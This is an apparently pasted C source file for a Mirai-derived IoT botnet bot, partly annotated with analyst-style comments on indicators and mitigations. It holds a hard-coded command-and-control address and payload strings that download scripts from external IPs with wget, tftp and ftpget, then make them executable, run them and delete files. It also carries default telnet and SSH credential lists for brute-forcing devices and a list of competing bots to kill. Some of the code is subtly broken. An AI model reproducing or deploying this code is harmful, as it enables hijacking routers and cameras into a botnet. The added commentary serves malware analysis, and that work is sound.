
Untitled

a guest
Feb 3rd, 2019
  1. #include <stdlib.h>
  2. #include <stdarg.h>
  3. #include <stdio.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <netinet/in.h>
  7. #include <arpa/inet.h>
  8. #include <netdb.h>
  9. #include <signal.h>
  10. #include <strings.h>
  11. #include <sys/utsname.h>
  12. #include <unistd.h>
  13. #include <fcntl.h>
  14. #include <errno.h>
  15. #include <netinet/ip.h>
  16. #include <netinet/udp.h>
  17. #include <netinet/tcp.h>
  18. #include <sys/wait.h>
  19. #include <sys/ioctl.h>
  20. #include <net/if.h>
  21. #include <time.h>
  22. #include <dirent.h>
  23. #include <limits.h>
  24. #include <sys/stat.h>
  25. #include <sys/time.h>
  26. #include <string.h>
  27. #include <stdint.h>
  28. #include <stdio.h>
  29. #include <sys/param.h>
  30. #include <sys/time.h>
/* INET_ADDR and ipv4_t are marked by the author as taken from the Mirai source.
 * The macro packs four octets into one IPv4 address in network byte order;
 * its arguments are pasted in unparenthesised, so pass plain values only. */
//mirai
#define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0)))
typedef uint32_t ipv4_t;
//end of mirai
/* Linux prctl() option that sets the calling thread's name, declared by hand
 * instead of including <sys/prctl.h>. No use is visible in this part of the
 * file; presumably the bot renames its process, in which case the name shown
 * in a process listing is not reliable for triage. */
#define PR_SET_NAME 15
/* Number of entries in the commServer[] endpoint table. */
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
/* Padding flags understood by prints() and printi(). */
#define PAD_RIGHT 1
#define PAD_ZERO 2
/* Size of printi()'s scratch buffer for one formatted integer. */
#define PRINT_BUF_LEN 12
/* Telnet command bytes (RFC 854) used by negotiate(). */
#define CMD_IAC 255
#define CMD_WILL 251
#define CMD_WONT 252
#define CMD_DO 253
#define CMD_DONT 254
/* Telnet option code 3, Suppress Go Ahead (RFC 858). */
#define OPT_SGA 3
/* Number of bytes advance_telstate() clears in telstate_t.sockbuf. */
#define SOCKBUF_SIZE 1024
/* Mixing constant used by init_rand() when filling the PRNG state. */
#define PHI 0x9e3779b9
/*
 * Returns a string literal naming the CPU architecture this binary was
 * compiled for. The choice is made entirely by the preprocessor; nothing is
 * probed at run time. The caller must not modify or free the result.
 *
 * How the tag is used is not visible in this part of the file (presumably it
 * is reported to the operator). A single source tree built once per
 * architecture means a sample of this kind is usually one of a set of
 * binaries served from the same download host.
 */
char *getBuild() {
#if defined(__x86_64__) || defined(_M_X64)
    return "x86_64";
#elif defined(__i386) || defined(_M_IX86)
    return "x86_32";
#elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
    return "ARM-4";
#elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
    return "ARM-5"
#elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
    return "ARM-6";
#elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
    return "MIPS";
#elif defined(__sh__)
    return "SUPERH";
#elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
    return "POWERPC";
#else
    return "UNKNOWN";
#endif
}
/*
 * Fixed pool of browser User-Agent strings. Nothing in this part of the file
 * reads the table; presumably it is used when the bot generates HTTP
 * requests -- confirm against the rest of the source.
 * The set is small and names long-outdated browser builds, so HTTP traffic
 * carrying exactly these values can serve as a weak fingerprint in web
 * server or proxy logs.
 */
const char *useragents[] = {
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
    "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
    "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
    "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
    "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
    "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
    "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
};
/*
 * Per-connection state for one telnet session handled by the scanner.
 * Fields touched by helpers in this part of the file are described from that
 * code; the remaining ones carry the author's own field comments.
 */
struct telstate_t {
    int fd;                     /* socket; closed by advance_telstate() when the new state is 0 */
    unsigned int ip;            /* IPv4 address, copied into in_addr.s_addr by get_telstate_host() */
    unsigned char state;        /* current step, written by advance_telstate() */
    unsigned char complete;     /* set to 1 by reset_telstate() */
    unsigned char usernameInd; /* username -- presumably an index into a username table; TODO confirm */
    unsigned char passwordInd; /* password -- presumably an index into a password table; TODO confirm */
    unsigned char tempDirInd; /* tempdir */
    unsigned int tTimeout; /* tTimeout -- reset to 0 by advance_telstate() */
    unsigned short bufUsed;
    char *sockbuf;              /* receive buffer; advance_telstate() zeroes SOCKBUF_SIZE bytes of it */
};
/* Forward declarations for functions defined further down the file. */
int initConnection();
void makeRandomStr(unsigned char *buf, int length);
int sockprintf(int sock, char *formatStr, ...);
char *inet_ntoa(struct in_addr in);
/* mainCommSock is the socket recvLine() reads from. currentServer is not
 * used in this part of the file (presumably an index into commServer[]). */
int mainCommSock = 0, currentServer = -1;
/* pids / numpids: child process ids recorded by listFork(). */
uint32_t *pids;
/* Per-task process ids; none is referenced in this part of the file.
 * scanPid is declared twice. */
uint32_t scanPid;
uint32_t bcmPid;
uint32_t testmiraiPid;
uint32_t testtelnetPid;
uint32_t scanPid;
uint32_t miraiPid;
uint16_t Phonepid;
uint64_t numpids = 0;
struct in_addr ourIP;
unsigned char macAddress[6] = {0};
/* Command-and-control endpoint, stored as "address:port" in plain text.
 * Network indicator: outbound TCP sessions from embedded devices to this
 * address and port. */
unsigned char *commServer[] = { "157.230.13.86:52" };
int Server_Botport = 52;
/* NULL-terminated table of response fragments; not read in this part of the
 * file (presumably passed to contains_string()). */
char* phone[] = {":", "ogin", "sername", "assword", "Linux", "9615-cdp", (char*)0};
/*
 * Shell command lines kept as plain strings, so they are recoverable from a
 * sample with a strings dump. Where they are sent is not visible in this part
 * of the file (presumably to a device after a successful login). Each one
 * changes to a writable directory, fetches scripts over HTTP, TFTP or FTP from
 * a hard-coded host, marks them executable, runs them and deletes the files.
 *
 * Host-side indicators: a shell running wget/curl/tftp/ftpget from /tmp
 * followed by "chmod 777" and "sh", and the file names bins.sh, tftp1.sh,
 * tftp2.sh, ftp1.sh and phone. Network-side indicators: the download
 * addresses inside the strings. Payload ends with "rm -rf *" and phonepayload
 * starts with it in /tmp, so files in those directories may be gone on an
 * affected device. Blocking outbound HTTP/TFTP/FTP from devices that have no
 * reason to initiate it stops this stage.
 */
char *Busybox_Payload = "cd /tmp; busybox wget http://195.201.102.101/bins.sh || busybox curl -O http://195.201.102.101/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp 195.201.102.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 195.201.102.101; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh;exit\r\n"; //Telnet Scanner Must implement Busybox.
char *Payload = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://157.230.13.86/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 157.230.13.86 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 157.230.13.86; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 157.230.13.86 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *"; //Normal Payload Without busybox Implemented.
char *phonepayload = "cd /tmp;rm -rf *;cd /tmp; wget http://157.230.13.86/bins.sh -O phone; chmod 777 phone; ./phone;rm -rf phone\r\n";
/*
 * Short username and password tables for telnet logins. The trailing comments
 * are the author's record of the intended user:password pair; they were not
 * checked against the array contents. The tables are not read in this part of
 * the file.
 * Every entry is a vendor default or trivial credential: a device is only
 * exposed to this list if telnet is reachable and the default login was never
 * changed.
 */
char *Telnet_Usernames[] = {
    "telnet\0", //telnet:telnet
    "root\0", //root:
    "root\0", //root:1234
};
char *Telnet_Passwords[] = {
    "telnet\0", //telnet:telnet
    "\0", //root:1234
    "root\0", //root:1234
};
/*
 * Username table named after the Mirai default-credential dictionary. The
 * trailing comments are the author's record of the intended user:password
 * pair for each line; they were not checked against the array contents, and
 * the table is not read in this part of the file.
 * The values are factory defaults of consumer routers, DVRs and IP cameras,
 * which is why changing default logins and closing telnet to the internet are
 * the effective mitigations.
 */
char *Mirai_Usernames[] = {
    "telnet\0"
    "root\0", //root:xc3511
    "root\0", //root:vizxv
    "root\0", //root:admin
    "admin\0", //admin:admin
    "root\0", //root:888888
    "root\0", //root:xmhdipc
    "root\0", //root:default
    "root\0", //root:juantech
    "root\0", //root:123456
    "root\0", //root:54321
    "support\0", //support:support
    "root\0", //root:(none)
    "admin\0", //admin:password
    "root\0", //root:root
    "root\0", //root:12345
    "user\0", //user:user
    "admin\0", //admin:(none)
    "root\0", //root:pass
    "admin\0", //admin:admin1234
    "root\0", //root:1111
    "admin\0", //admin:smcadmin
    "admin\0", //admin:1111
    "root\0", //root:666666
    "root\0", //root:password
    "root\0", //root:1234
    "root\0", //root:klv123
    "Administrator\0", //Administrator:admin
    "service\0", //service:service
    "supervisor\0", //supervisor:supervisor
    "guest\0", //guest:guest
    "guest\0", //guest:12345
    "guest\0", //guest:12345
    "admin1\0", //admin1:password
    "administrator\0", //administrator:1234
    "666666\0", //666666:666666
    "888888\0", //888888:888888
    "ubnt\0", //ubnt:ubnt
    "klv1234\0", //root:klv1234
    "Zte521\0", //root:Zte521
    "hi3518\0", //root:hi3518
    "jvbzd\0", //root:jvbzd
    "anko\0", //root:anko
    "zlxx\0", //root:zlxx
    "7ujMko0vizxv\0", //root:7ujMko0vizxv
    "7ujMko0admin\0", //root:7ujMko0admin
    "system\0", //root:system
    "ikwb\0", //root:ikwb
    "dreambox\0", //root:dreambox
    "user\0", //root:user
    "realtek\0", //root:realtek
    "00000000\0", //root:00000000
    "1111111\0", //admin:1111111
    "1234\0", //admin:1234
    "12345\0", //admin:12345
    "54321\0", //admin:54321
    "123456\0", //admin:123456
    "7ujMko0admin\0", //admin:7ujMko0admin
    "1234\0", //admin:1234
    "pass\0", //admin:pass
    "meinsm\0", //admin:meinsm
    "tech\0", //tech:tech
    "fucker\0", //mother:fucker
    "pi\0", //mother:fucker
};
/*
 * Password table that accompanies Mirai_Usernames. The trailing comments are
 * the author's record of the intended user:password pair for each line; they
 * were not checked against the array contents, and the table is not read in
 * this part of the file.
 * For auditing, any device still accepting one of these values on a remote
 * login service should be treated as exposed.
 */
char *Mirai_Passwords[] = {
    "telnet\0"
    "xc3511\0", //root:xc3511
    "vizxv\0", //root:vizxv
    "admin\0", //root:admin
    "admin\0", //admin:admin
    "888888\0", //root:888888
    "xmhdipc\0", //root:xmhdipc
    "default\0", //root:default
    "juantech\0", //root:juantech
    "123456\0", //root:123456
    "54321\0", //root:54321
    "support\0", //support:support
    "\0", //root:(none)
    "password\0", //admin:password
    "root\0", //root:root
    "12345\0", //root:12345
    "user\0", //user:user
    "\0", //admin:(none)
    "pass\0", //root:pass
    "admin1234\0", //admin:admin1234
    "1111\0", //root:1111
    "smcadmin\0", //admin:smcadmin
    "1111\0", //admin:1111
    "666666\0", //root:666666
    "password\0", //root:password
    "1234\0", //root:1234
    "klv123\0", //root:klv123
    "admin\0", //Administrator:admin
    "service\0", //service:service
    "supervisor\0", //supervisor:supervisor
    "guest\0", //guest:guest
    "12345\0", //guest:12345
    "123456\0", //guest:12345
    "password\0", //admin1:password
    "1234\0", //administrator:1234
    "666666\0", //666666:666666
    "888888\0", //888888:888888
    "ubnt\0", //ubnt:ubnt
    "klv1234\0", //root:klv1234
    "Zte521\0", //root:Zte521
    "hi3518\0", //root:hi3518
    "jvbzd\0", //root:jvbzd
    "anko\0", //root:anko
    "zlxx\0", //root:zlxx
    "7ujMko0vizxv\0", //root:7ujMko0vizxv
    "7ujMko0admin\0", //root:7ujMko0admin
    "system\0", //root:system
    "ikwb\0", //root:ikwb
    "dreambox\0", //root:dreambox
    "user\0", //root:user
    "realtek\0", //root:realtek
    "00000000\0", //root:00000000
    "1111111\0", //admin:1111111
    "1234\0", //admin:1234
    "12345\0", //admin:12345
    "54321\0", //admin:54321
    "123456\0", //admin:123456
    "7ujMko0admin\0", //admin:7ujMko0admin
    "1234\0", //admin:1234
    "pass\0", //admin:pass
    "meinsm\0", //admin:meinsm
    "tech\0", //tech:tech
    "fucker\0", //mother:fucker
    "raspberry\0", //mother:fucker

};
/*
 * Username and password tables labelled for SSH. The trailing comments are
 * the author's; they were not checked against the array contents, and neither
 * table is read in this part of the file.
 * All values are well-known defaults, so key-only SSH authentication or a
 * changed password takes a host out of this list's reach.
 */
char *SSH_Usernames[] = {
    "root\0", //root:root
    "admin\0", //admin:admin
    "admin\0", //admin:1234
    "ubnt\0", //ubnt:ubnt
    "pi\0", //mother:fucker
};
char *SSH_Passwords[] = {
    "root\0", //root:root
    "admin\0", //admin:admin
    "1234\0", //admin:1234
    "ubnt\0", //ubnt:ubnt
    "raspberry\0", //mother:fucker
};
/*
 * Table of process or file name patterns, some with a trailing '*' wildcard.
 * The table is not read in this part of the file; going by its name it is a
 * list of competing bot binaries to be terminated or removed (presumably
 * matched with wildString()) -- confirm against the rest of the source.
 * The list also holds ordinary names such as "sh", "wget" and "busybox", so on
 * an affected device legitimate processes with those names may disappear too;
 * unexplained loss of such processes is a host-side symptom worth correlating
 * with the network indicators.
 */
char *Bot_Killer_Binarys[] = {
    "mips",
    "mipsel",
    "sh4",
    "x86",
    "i686",
    "ppc",
    "i586",
    "i586",
    "jack*",
    "hack*",
    "arm*"
    "tel*"
    "b1",
    "b2",
    "b3",
    "b4",
    "b5",
    "b6",
    "b7",
    "b8",
    "b9",
    "lol*",
    "busybox*",
    "badbox*",
    "DFhxdhdf",
    "dvrHelper",
    "FDFDHFC",
    "FEUB",
    "FTUdftui",
    "GHfjfgvj",
    "jhUOH",
    "JIPJIPJj",
    "JIPJuipjh",
    "kmyx86_64",
    "lolmipsel",
    "mips",
    "mipsel",
    "RYrydry",
    "TwoFace*",
    "UYyuyioy",
    "wget",
    "x86_64",
    "XDzdfxzf",
    "xx*",
    "sh",
    "1",
    "2",
    "3",
    "4",
    "5",
    "6",
    "7",
    "8",
    "9",
    "10",
    "11",
    "12",
    "13",
    "14",
    "15",
    "16",
    "17",
    "18",
    "19",
    "20",
    "busybox",
    "badbox",
    "Mirai*",
    "mirai*",
    "cunty*",
    "IoT*",
    "pl0*",
    "cc*"
};
/* NULL-terminated list of directory globs; not read in this part of the file. */
char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*", (char*) 0};
/*
 * NULL-terminated substring tables for contains_string(). fails and successes
 * are the tables behind contains_fail() and contains_success(); advances and
 * advances2 are not read in this part of the file.
 * The fragments are cut so that they match regardless of the first letter's
 * case ("ogin", "assword", "nvalid"). Entries such as "dvrdvs", "mdm9625",
 * "9615-cdp", "F600", "F660", "F609" and "BCM" look like device banner or
 * model strings -- an assumption, not established by this code.
 */
char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
/* State of the PRNG implemented by init_rand() and rand_cmwc(): 4096 lag
 * words plus the carry. */
static uint32_t Q[4096], c = 362436;
/*
 * Seeds the generator state Q[] from x.
 * The first three words come straight from the seed and PHI; every later
 * word mixes the entries three and two places back with PHI and its own index.
 */
void init_rand(uint32_t x) {
    int idx;

    Q[0] = x;
    Q[1] = x + PHI;
    Q[2] = x + PHI + PHI;

    idx = 3;
    while (idx < 4096) {
        Q[idx] = Q[idx - 3] ^ Q[idx - 2] ^ PHI ^ idx;
        idx++;
    }
}
/*
 * Returns the next 32-bit value of a complementary multiply-with-carry
 * generator over the 4096-word state Q[] and the carry c (the parameters
 * match Marsaglia's CMWC4096). The state index is a function-local static, so
 * the sequence is shared by every caller in the process.
 * This is a statistical generator, not a cryptographic one: its output is
 * reproducible from the seed passed to init_rand().
 */
uint32_t rand_cmwc(void) {
    uint64_t t, a = 18782LL;
    static uint32_t i = 4095;
    uint32_t x, r = 0xfffffffe;
    i = (i + 1) & 4095;             /* advance and wrap within the 4096 words */
    t = a * Q[i] + c;               /* 64-bit multiply-add; the high half becomes the new carry */
    c = (uint32_t)(t >> 32);
    x = t + c;                      /* truncated to 32 bits on assignment */
    if (x < c) {                    /* the 32-bit addition wrapped */
        x++;
        c++;
    }
    return (Q[i] = r - x);          /* store the complement and return it */
}
/*
 * Reads from fd one byte at a time into buffer until a newline has been
 * stored, bufferSize bytes have been counted, or read() returns something
 * other than 1.
 * Returns NULL only when the last read() returned 0 (end of file); a read()
 * error (-1) still returns buffer. The data is not NUL-terminated here.
 */
unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
{
    int got = 1, total = 0;
    /* NOTE(review): on the first pass total is 0, so the newline test looks at
     * buffer[-1], one byte before the caller's buffer. total is incremented
     * even when read() did not deliver a byte. */
    while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
    return got == 0 ? NULL : buffer;
}
/*
 * Case-insensitive substring search: returns 1 if buffer contains any entry
 * of the NULL-terminated table strings, otherwise 0.
 * The counting loop begins by testing strings[1], so the table is expected to
 * hold at least one entry ahead of its terminator. buffer must be
 * NUL-terminated. strcasestr() is a GNU/BSD extension.
 */
int contains_string(char* buffer, char** strings) {
    int num_strings = 0, i = 0;
    /* count the entries up to the terminating null pointer */
    for(num_strings = 0; strings[++num_strings] != 0; );
    for(i = 0; i < num_strings; i++) {
        if(strcasestr(buffer, strings[i])) {
            return 1;
        }
    }
    return 0;
}
/* Returns 1 if buffer contains any fragment from the successes[] table, else 0. */
int contains_success(char* buffer) {
    return contains_string(buffer, successes);
}
/* Returns 1 if buffer contains any fragment from the fails[] table, else 0. */
int contains_fail(char* buffer) {
    return contains_string(buffer, fails);
}
/* Returns nonzero if buffer matches either the successes[] or the fails[]
 * table, i.e. the peer has given a recognisable answer of either kind. */
int contains_response(char* buffer) {
    return contains_success(buffer) || contains_fail(buffer);
}
/*
 * Waits up to timeout_usec microseconds for fd to become readable, then does
 * a single recv() of at most buf_size bytes into buffer.
 * Returns 0 when select() times out or fails; otherwise returns recv()'s
 * result unchanged, which may be -1 on error or 0 when the peer has closed.
 * tv_sec is fixed at 0, so the whole timeout is carried in tv_usec.
 */
int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
    fd_set read_set;
    struct timeval tv;
    tv.tv_sec = 0;
    tv.tv_usec = timeout_usec;
    FD_ZERO(&read_set);
    FD_SET(fd, &read_set);
    if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
        return 0;
    return recv(fd, buffer, buf_size, 0);
}
/*
 * Clears buffer, performs one timed read into it and reports whether the data
 * contains any entry of the NULL-terminated table strings.
 * If the first byte compares equal to 0xFF (the telnet IAC byte), the start
 * of the buffer is passed to negotiate() before the search.
 * Returns 1 on a match, otherwise 0. Despite the name there is no loop: one
 * read is made per call. num_bytes is stored but not examined and i is unused.
 * negotiate() is defined later in the file and has no prototype at this point.
 */
int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
    int num_bytes, i;
    memset(buffer, 0, buf_size);
    num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
    if(buffer[0] == 0xFF) {
        negotiate(fd, buffer, 3);
    }
    if(contains_string(buffer, strings)) {
        return 1;
    }
    return 0;
}
/*
 * Returns the dotted-quad text form of telstate->ip.
 * The string comes from inet_ntoa(), which uses a static buffer: it is
 * overwritten by the next inet_ntoa() call and must not be freed.
 */
const char* get_telstate_host(struct telstate_t* telstate) { // get host
    struct in_addr in_addr_ip;
    in_addr_ip.s_addr = telstate->ip;
    return inet_ntoa(in_addr_ip);
}
/*
 * Moves a session to new_state: resets its timeout counter and zeroes
 * SOCKBUF_SIZE bytes of its receive buffer. State 0 additionally closes the
 * socket, so 0 acts as the idle state here.
 * telstate->sockbuf must point to at least SOCKBUF_SIZE bytes.
 */
void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
    if(new_state == 0) {
        close(telstate->fd);
    }
    telstate->tTimeout = 0;
    telstate->state = new_state;
    memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
}
/* Returns the session to state 0 (which closes its socket and clears its
 * buffer) and marks it complete. */
void reset_telstate(struct telstate_t* telstate) { // reset
    advance_telstate(telstate, 0);
    telstate->complete = 1;
}
/*
 * Strips leading and trailing whitespace from str in place.
 * The surviving characters are shifted to the front of the buffer and the
 * string is re-terminated; a string of only whitespace becomes empty.
 */
void trim(char *str) {
    int first = 0;
    int last = (int)(strlen(str) - 1);
    int src;

    /* skip whitespace at the front */
    for (; isspace(str[first]); first++) {
    }
    /* back up over whitespace at the end */
    for (; last >= first && isspace(str[last]); last--) {
    }

    /* slide the kept range down to index 0 */
    src = first;
    while (src <= last) {
        str[src - first] = str[src];
        src++;
    }
    str[src - first] = '\0';
}
/*
 * Emits one character for the formatter.
 * With a non-null str the character is stored at *str and the cursor is
 * advanced; with a null str one byte is written to file descriptor 1.
 */
static void printchar(unsigned char **str, int c) {
    if (!str) {
        (void)write(1, &c, 1);
        return;
    }
    *(*str)++ = c;
}
/*
 * Emits string through printchar(), padded to width characters.
 * pad is a bit mask: PAD_RIGHT left-justifies (padding goes after the text),
 * PAD_ZERO pads with '0' instead of a space. A width of 0 disables padding.
 * Returns the number of characters emitted.
 */
static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
    int emitted = 0;
    int fill = ' ';

    if (width > 0) {
        int len = 0;
        const unsigned char *p = string;

        while (*p) {
            ++p;
            ++len;
        }
        /* from here on width is the amount of padding still owed */
        width = (len >= width) ? 0 : width - len;
        if (pad & PAD_ZERO)
            fill = '0';
    }

    if (!(pad & PAD_RIGHT)) {
        while (width > 0) {
            printchar(out, fill);
            ++emitted;
            --width;
        }
    }

    while (*string) {
        printchar(out, *string);
        ++emitted;
        ++string;
    }

    /* only reached with padding left when PAD_RIGHT was set */
    while (width > 0) {
        printchar(out, fill);
        ++emitted;
        --width;
    }

    return emitted;
}
/*
 * Formats the integer i in base b and emits it through prints().
 *   sg      - nonzero to treat i as signed (honoured only for base 10)
 *   width   - minimum field width, 0 for none
 *   pad     - PAD_RIGHT / PAD_ZERO flags
 *   letbase - 'a' or 'A', the letter used for digit value 10
 * Returns the number of characters emitted.
 * Digits are produced right to left into print_buf, starting from its last
 * byte; PRINT_BUF_LEN is 12 bytes.
 */
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
    unsigned char print_buf[PRINT_BUF_LEN];
    register unsigned char *s;
    register int t, neg = 0, pc = 0;
    register unsigned int u = i;
    if (i == 0) {
        print_buf[0] = '0';
        print_buf[1] = '\0';
        return prints (out, print_buf, width, pad);
    }
    if (sg && b == 10 && i < 0) {
        neg = 1;
        u = -i;     /* NOTE(review): negating INT_MIN overflows a signed int */
    }
    s = print_buf + PRINT_BUF_LEN-1;
    *s = '\0';
    while (u) {
        t = u % b;
        if( t >= 10 )
            t += letbase - '0' - 10;    /* map 10.. onto letters starting at letbase */
        *--s = t + '0';
        u /= b;
    }
    if (neg) {
        /* with zero padding the sign goes out first so the zeros follow it */
        if( width && (pad & PAD_ZERO) ) {
            printchar (out, '-');
            ++pc;
            --width;
        }
        else {
            *--s = '-';
        }
    }
    return pc + prints (out, s, width, pad);
}
/*
 * Minimal printf engine. Walks format and emits output through printchar():
 * into *out when out is non-null, otherwise to file descriptor 1.
 * Supported conversions: %s %d %x %X %u %c and %%, with an optional '-' flag,
 * '0' flag and decimal width. Any other conversion character is dropped
 * without consuming an argument.
 * Returns the number of characters emitted. When out is non-null the result
 * is NUL-terminated. There is no output size limit: the caller's buffer must
 * be large enough for the formatted text.
 * va_end() is called here on the caller's va_list.
 */
static int print(unsigned char **out, const unsigned char *format, va_list args ) {
    register int width, pad;
    register int pc = 0;
    unsigned char scr[2];
    for (; *format != 0; ++format) {
        if (*format == '%') {
            ++format;
            width = pad = 0;
            if (*format == '\0') break;
            if (*format == '%') goto out;   /* "%%" falls through to the literal path below */
            if (*format == '-') {
                ++format;
                pad = PAD_RIGHT;
            }
            while (*format == '0') {
                ++format;
                pad |= PAD_ZERO;
            }
            for ( ; *format >= '0' && *format <= '9'; ++format) {
                width *= 10;
                width += *format - '0';
            }
            if( *format == 's' ) {
                /* NOTE(review): the argument is fetched as int and cast to a
                 * pointer, which only round-trips where int and pointers
                 * have the same width. */
                register char *s = (char *)va_arg( args, int );
                pc += prints (out, s?s:"(null)", width, pad);
                continue;
            }
            if( *format == 'd' ) {
                pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
                continue;
            }
            if( *format == 'x' ) {
                pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
                continue;
            }
            if( *format == 'X' ) {
                pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
                continue;
            }
            if( *format == 'u' ) {
                pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
                continue;
            }
            if( *format == 'c' ) {
                scr[0] = (unsigned char)va_arg( args, int );
                scr[1] = '\0';
                pc += prints (out, scr, width, pad);
                continue;
            }
        }
        else {
        out:
            printchar (out, *format);
            ++pc;
        }
    }
    if (out) **out = '\0';
    va_end( args );
    return pc;
}
/*
 * printf replacement that writes to file descriptor 1 via print().
 * Returns the number of characters emitted. va_end() is performed inside
 * print(), not here.
 */
int zprintf(const unsigned char *format, ...) {
    va_list args;
    va_start( args, format );
    return print( 0, format, args );
}
/*
 * sprintf replacement: formats into out via print() and NUL-terminates it.
 * Returns the number of characters written, not counting the terminator.
 * No size is passed, so out must be large enough for the formatted text.
 * va_end() is performed inside print(), not here.
 */
int szprintf(unsigned char *out, const unsigned char *format, ...) {
    va_list args;
    va_start( args, format );
    return print( &out, format, args );
}
/*
 * Formats a message, appends a newline and sends it on sock.
 * The text is built in a zeroed 2048-byte heap buffer, echoed to standard
 * output through zprintf(), sent with MSG_NOSIGNAL and the buffer is freed.
 * Returns send()'s result: bytes sent, or -1 on error.
 *
 * Every message is a single newline-terminated text line, which makes the
 * traffic on this socket easy to read in a packet capture.
 * NOTE(review): the malloc() result is not checked, and print() is not told
 * the buffer size, so the 2048-byte limit is not enforced while formatting.
 */
int sockprintf(int sock, char *formatStr, ...) {
    unsigned char *textBuffer = malloc(2048);
    memset(textBuffer, 0, 2048);
    char *orig = textBuffer;            /* print() advances textBuffer; keep the start */
    va_list args;
    va_start(args, formatStr);
    print(&textBuffer, formatStr, args);
    va_end(args);
    orig[strlen(orig)] = '\n';          /* the buffer was zeroed, so the text stays terminated */
    zprintf("%s\n", orig);
    int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
    free(orig);
    return q;
}
/*
 * Case-insensitive wildcard match of string against pattern.
 * '*' matches any run of characters (including none) and '?' matches exactly
 * one character. The result follows the strcmp convention: 0 means the
 * string matches, nonzero means it does not. When the pattern is exhausted
 * the return value is the next character of string.
 */
int wildString(const unsigned char* pattern, const unsigned char* string) {
    const unsigned char head = *pattern;

    if (head == '\0')
        return *string;

    if (head == '*') {
        /* let the star match nothing ... */
        if (wildString(pattern + 1, string) == 0)
            return 0;
        /* ... or swallow one more character and try again */
        if (*string != '\0' && wildString(pattern, string + 1) == 0)
            return 0;
        return 1;
    }

    if (head == '?') {
        if (*string == '\0')
            return 1;
        return wildString(pattern + 1, string + 1) != 0;
    }

    if (toupper(head) != toupper(*string))
        return 1;
    return wildString(pattern + 1, string + 1) != 0;
}
/*
 * Parses the dotted-quad text toGet into i->s_addr with inet_addr().
 * Returns 0 on success and 1 when inet_addr() reports failure (-1).
 * No name resolution takes place: h is declared but never used, so only
 * numeric IPv4 addresses are accepted.
 */
int getHost(unsigned char *toGet, struct in_addr *i) {
    struct hostent *h;
    if((i->s_addr = inet_addr(toGet)) == -1) return 1;
    return 0;
}
/*
 * Fills buf[0..length-1] with pseudo-random upper-case letters 'A'..'Z'
 * (65 + value in 0..25) drawn from rand_cmwc().
 * No terminator is written; the caller has to add one if a string is needed.
 */
void makeRandomStr(unsigned char *buf, int length) {
    int i = 0;
    for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
}
/*
